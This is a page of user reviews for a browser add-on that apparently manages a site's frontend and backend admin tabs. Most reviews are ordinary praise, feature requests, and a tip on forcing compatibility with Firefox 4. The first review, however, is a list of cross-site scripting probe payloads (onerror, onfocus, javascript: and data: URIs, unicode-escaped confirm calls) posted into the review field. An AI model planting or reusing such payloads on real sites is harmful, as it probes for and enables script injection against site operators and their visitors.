Bedømmelse: 4 ud af 5 stjerner

"><img src=x onerror=prompt(1)>
"><h1 onclick=prompt(1)>Clickme</h1>
"><a href=javascript:prompt(1)>Clickme</a>
"><a href="javascript:confirm%28 1%29">Clickme</a>
"><a href="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+">click</a>
"><textarea autofocus onfocus=prompt(1)>
"><img src=x onerror=co\u006efir\u006d`1`>
"><iframe/src=javascript:co\u006efir\u006d%28 1%29>
"><h1 onclick=co\u006efir\u006d(1)>Clickme</h1>
"><a href=javascript:prompt%28 1%29>Clickme</a>
"><a href="javascript:co\u006efir\u006d%28 1%29">Clickme</a>
"><textarea autofocus onfocus=co\u006efir\u006d(1)>
"><iframe srcdoc="&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;">

Denne bruger har en tidligere anmeldelse af denne tilføjelse.

Bedømmelse: 5 ud af 5 stjerner

This extenson is great! Many thanks! just two suggestions:

1. It would be great if you add the option to open the Backend tab next to the Frontend Tab, because when you have many tabs opened, it would be easier to move from one tab to the other.

2. Sometimes for security reasons or because of .httaccess redirection, you change Backend directory name, from "" to "" or "domain/anything/anything". So it would be great to have the option to set an "administrator" directory per site basis. I mean, to have:

A. a default "" (most common).

B. an optional default: ""

C. custom directory for each site

I'd like to do it, but I don't know how! =(

Bedømmelse: 5 ud af 5 stjerner

great tooll
I have FF4 and force compatibility
download xpi file
change to zip estension
open zip and edit intall.rdf
change <em:maxVersion>4.0b8pre</em:maxVersion>
save and chage zip file to xpi extension
and works fine

please for nex version add a quick buttons for toolbar please

Denne anmeldelse er af en tidligere version af tilføjelsen (1.4). 

Bedømmelse: 4 ud af 5 stjerner

Great little plugin! For that final star (!), you may think about amending the ?tp=1 code to work on pages other than the home page - so it needs to add &tp=1 to the end of the URL.

Denne anmeldelse er af en tidligere version af tilføjelsen (1.4). 

Bedømmelse: 5 ud af 5 stjerner

I'm trying to guess why it isn't working properly here. Could be SeaMonkey... :)

Need any help there? Congratulations on your idea/initiative! :)

Denne anmeldelse er af en tidligere version af tilføjelsen (1.0.5). 

Bedømmelse: 4 ud af 5 stjerner

Great Tool - Why hasn´t it been developed before?

Denne anmeldelse er af en tidligere version af tilføjelsen (1.0.5).